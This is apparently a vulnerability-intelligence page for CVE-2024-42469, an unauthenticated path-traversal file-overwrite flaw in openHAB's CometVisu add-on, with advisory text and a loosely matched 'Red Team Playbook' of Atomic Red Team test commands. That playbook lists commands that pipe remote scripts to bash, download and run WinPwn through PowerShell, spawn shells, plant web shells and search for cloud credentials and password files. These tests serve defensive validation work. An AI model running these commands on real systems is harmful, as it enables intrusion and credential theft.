CVE-2024-42469
Overview
This vulnerability is a path traversal flaw combined with an authentication bypass affecting the CometVisu visualization add-on within openHAB's openhab-webui. The root cause is that certain file system endpoints do not enforce authentication, allowing unauthenticated users to access and modify files. Specifically, the endpoint responsible for updating existing files fails to validate or sanitize file path inputs, enabling traversal outside the intended directories.
Vulnerability Description
openHAB, a provider of open-source home automation software, has add-ons including the visualization add-on CometVisu. Prior to version 4.2.1, CometVisu's file system endpoints don't require authentication and additionally the endpoint to update an existing file is susceptible to path traversal. This makes it possible for an attacker to overwrite existing files on the openHAB instance. If the overwritten file is a shell script that is executed at a later time, this vulnerability can allow remote code execution by an attacker. Users should upgrade to version 4.2.1 to receive a patch.
Impact
An unauthenticated attacker with network access can overwrite arbitrary files on the openHAB instance by exploiting the unauthenticated file update endpoint with path traversal payloads. This can lead to remote code execution if critical files such as shell scripts are overwritten and later executed. The vulnerability requires no user interaction or privileges (AV:N/AC:L/PR:N/UI:N) and impacts confidentiality, integrity, and availability (C:H/I:H/A:H), potentially resulting in full system compromise and disruption of home automation services.
Solution
Users should upgrade openHAB to version 4.2.1 or later, as detailed in the GitHub security advisory GHSA-f729-58x4-gqgf (https://github.com/openhab/openhab-webui/security/advisories/GHSA-f729-58x4-gqgf). The patch introduced in commit 630e8525835c698cf58856aa43782d92b18087f2 implements authentication enforcement and input validation on the CometVisu file system endpoints. No alternative workarounds are specified; updating to the fixed version is required to remediate this issue.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the openHAB home automation software, specifically within the CometVisu visualization add-on, presents a significant security risk due to its lack of authentication for file system endpoints and susceptibility to path traversal attacks. This flaw enables unauthorized users to access and manipulate files within the system. The absence of authentication means that any individual with network access can interact with these endpoints, while the path traversal aspect allows attackers to navigate the file system and potentially overwrite critical files. This combination of factors creates a pathway for malicious actors to execute arbitrary code on the affected instance, particularly if they can replace a file with a malicious script that is executed by the system.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could craft a request to the vulnerable endpoint, leveraging the path traversal capability to specify a file outside the intended directory. By overwriting a file with a malicious payload, the attacker can set up the system to execute this payload when the file is called upon by the automation software. This could lead to remote code execution, allowing the attacker to gain control over the home automation system, manipulate connected devices, or extract sensitive information. Given the nature of home automation systems, which often control critical infrastructure such as lighting, security systems, and HVAC, the potential for disruption and unauthorized access is substantial.
The real-world impact of this vulnerability is significant, particularly for users who rely on openHAB for their home automation needs. The risk extends beyond mere inconvenience; it poses a threat to personal safety and privacy. An attacker gaining control over home automation systems could disable security features, manipulate environmental controls, or even surveil users through connected devices. For businesses that utilize openHAB in commercial settings, the implications are even more severe, potentially leading to operational disruptions, financial losses, and reputational damage. The high CVSS score of 9.8 underscores the critical nature of this vulnerability, indicating that it should be prioritized for remediation.
To detect and mitigate this vulnerability, organizations should implement several strategies. First, upgrading to version 4.2.1 or later is essential, as this version includes a patch that addresses the authentication and path traversal issues. Regularly updating software and add-ons is a fundamental practice in maintaining security hygiene. Additionally, organizations should conduct thorough security assessments of their openHAB deployments, including penetration testing to identify any potential weaknesses. Monitoring network traffic for unusual access patterns or unauthorized attempts to interact with file system endpoints can also help in early detection of exploitation attempts.
In conclusion, the vulnerability in the CometVisu add-on of openHAB represents a serious threat to the security of home automation systems. The combination of unauthenticated access and path traversal creates a pathway for remote code execution, with potentially devastating consequences for users. By prioritizing updates, conducting regular security assessments, and implementing robust monitoring practices, organizations can mitigate the risks associated with this vulnerability and enhance the overall security posture of their home automation environments.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Openhab | Openhab | All |
cpe:2.3:a:openhab:openhab:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-42469 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/openhab/openhab-webui/security/advisories/GHSA-f729-58x4-gqgf |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/openhab/openhab-webui/commit/630e8525835c698cf58856aa43782d92b18087f2 |